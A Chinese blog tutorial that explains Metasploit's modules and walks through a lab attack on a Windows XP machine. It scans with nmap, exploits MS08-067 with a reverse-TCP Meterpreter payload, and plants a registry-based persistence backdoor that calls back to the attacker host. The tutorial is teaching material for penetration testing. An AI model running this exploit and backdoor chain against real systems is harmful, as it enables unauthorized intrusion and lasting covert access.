小白客带你走进黑客世界20之优雅而又潇洒的攻陷一台计算机

在上一篇文章中,小白为大家介绍了metasploit的安装过程,在这一篇文章中,我们来进一步了解metasploit渗透框架,为什么受到那么多安全技术人员的追捧。

0x01 metasploit小解析

首先我们来看一张图片
(图片内容参考至:http://blog.csdn.net/attack_eg/article/details/52337646)

metasploit框架结构图

Metasploit在设计上尽可能的采用了模块化的理念,提升代码复用效率。上图是metasploit的体系结构图,由图可以看出metasploit由插件,接口,功能程序,模块四大部分组成。其中:

插件

  • 是能够扩充metasploit功能,组合外部工具的具有高级特性的组件。如可以将nessus,nmap,openvas等外部扫描器结合在一起使用,为用户提供一些新的功能命令。

接口

  • 使用metasploit功能的入口。

程序功能

  • 程序功能可以看作是metasploit提供的额外的小工具,帮助渗透测试人员能够更好的完成渗透任务。这些额外的小工具包括后门程序制作,免杀处理等。

模块

  • 模块是metasploit最核心的部分。根据渗透测试的流程,模块更是被细分出六大子模块,每一个子模块都拥有非常清晰的结构和一个预定义好的接口,可以被装载到metasploit框架中,并可以组合支持信息收集、渗透攻击与后渗透攻击拓展等渗透测试任务。

0x02 metasploit与攻击行为模型

再次回到《小白客带你走进黑客世界1之入门》(传送门:http://www.jianshu.com/p/37a704a07f17),我们说过,黑客的攻击行为大致上会遵循一个模型:

踩点-->定位-->入侵-->留后门-->抹去痕迹

那么这个攻击模型怎么和我们的metasploit结合起来呢?

踩点、定位:

  • 使用metasploit的插件部分,调用nmap、nessus、openvas等扫描器进行信息收集和漏洞扫描。

入侵:

  • 使用metasploit的模块部分,调用渗透攻击模块、攻击载荷模块攻陷计算机系统

留后门:

  • 调用后渗透模块,建立可持续访问后门。
  • 调用渗透测试攻击模块,连接后门

抹去痕迹:

  • 文章不涉及

现在会不会有点明白了呢?

接下来,针对上述攻击模型和metasploit在各个环节中的使用进行一次实战演练。

0x03 metasploit演练

实验环境

  • 攻击主机:装有metasploit的linux计算机(ip地址:192.168.1.101/24)
  • 受害靶机:存在漏洞的windows xp计算机(ip地址:192.168.1.151)
  • 网络环境:两台计算机属于同一个局域网

实验要求

参照攻击行为模型,使用metasploit攻陷受害靶机。

演练开始:

准备工作

第一步:切换到root权限

Ubuntu/Debian等系统切换命令:sudo su

切换到root权限

第二步:安装nmap扫描器(ubuntu/debian下)(已有可跳过)

安装命令:apt-get install nmap

ubuntu/debian下安装nmap

第三步:在linux控制台中进入metasploit的控制台终端

相关命令:msfconsole

通过控制台打开metasploit

提示:计算机上没有安装metasploit的同学请参考《小白客带你走进黑客世界19之领略metasploit的风骚走位》,传送门:http://www.jianshu.com/p/276c0649f069

踩点、定位

第一步:使用metasploit的插件部分,调用nmap进行漏洞扫描,确定攻击方向。

相关命令:msf > nmap --script=vuln 受害靶机ip地址


调用nmap进行漏洞扫描

等待几分钟,可以看到扫描结果又是我们很熟悉的ms08-067漏洞。


检测到ms08-067漏洞

接下来,就以ms08-067为攻击方向,进行下一步攻击操作。

入侵

使用metasploit的模块部分,调用渗透攻击模块(exploit)、攻击载荷模块(payload)攻陷计算机系统。

第一步,调用针对ms08-067这个漏洞的渗透攻击模块

  1. 搜索关于ms08-067漏洞可利用的渗透攻击模块(exploit),共找到了一个可用的渗透攻击模块

相关命令:msf > search ms08_067

搜索可用渗透测试攻击模块
  1. 调用找到的渗透攻击模块

相关命令:msf > use exploit/windows/smb/ms08_067_netapi

渗透攻击模块调用

第二步,调用攻击载荷模块,即攻入受害靶机后需要在靶机上执行的代码。

  1. 搜索可用的攻击载荷模块(payload)

相关命令:msf exploit(ms08_067_netapi) > show payloads

搜索可用的攻击载荷模块
  1. 在这里,我们使用比较经典的meterpreter tcp回弹的攻击载荷(payload)


    meterpreter tcp回弹载荷
  2. 调用攻击载荷

相关命令:msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

调用攻击载荷

第三步,设置其他攻击必要参数

  1. 查看metasploit针对ms08-067的攻击还需要哪些必要参数

相关命令:msf exploit(ms08_067_netapi) > show options


查看还需要哪些参数
  1. 由查看结果得出,想要进行攻击还需要设置RHOST和LHOST参数,其中RHOST参数值为受害靶机的ip地址,LHOST设置的是攻击主机的ip地址。

  2. 接下来,设置LHOST参数和RHOST参数

相关命令:
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.151
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.101

设置RHOST参数
设置LHOST参数
  1. 最后,设置完毕之后敲入命令exploit即可开始攻击

相关命令:
msf exploit(ms08_067_netapi) > exploit

攻击完成
  1. 查看ip地址,验证是否攻击成功

相关命令:meterpreter > ipconfig

验证攻击是否成功
留后门

(内容参考至:http://blog.csdn.net/qq_34841823/article/details/54927957)

第一步:调用persistence后渗透模块,在受害靶机的注册表值 HKLM\Software\Microsoft\Windows\Currentversion\Run中添加键值,达到自启动的目的。

  • -X参数指定启动的方式为开机自启动。
  • -i的参数指定反向连接的时间间隔。
  • -p指的是将后门连接到指定端口。
  • -r指的是想要连接后门的攻击主机的IP地址。

相关命令:meterpreter > run persistence -X -i 5 -p 443 -r 192.168.1.101


调用后渗透模块

第二步:调用渗透测试攻击模块,监听刚设置的443端口,连接后门。

  1. 调用渗透测试攻击模块

相关命令:
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.101
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit

后门连接成功
  1. 查看ip地址,验证是否攻击成功

相关命令:meterpreter > ipconfig

验证后门是否连接成功

0x04 总结

  • 重点理解攻击行为模型和metasploit攻击操作过程。

推荐精品干货:

PS:搜索关注专题《黑客师》,小白客带你走进神秘的黑客世界。

关注专题:黑客师
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,793评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,567评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,342评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,825评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,814评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,680评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,033评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,687评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 42,175评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,668评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,775评论 1 332
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,419评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,020评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,978评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,206评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,092评论 2 351
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,510评论 2 343

推荐阅读更多精彩内容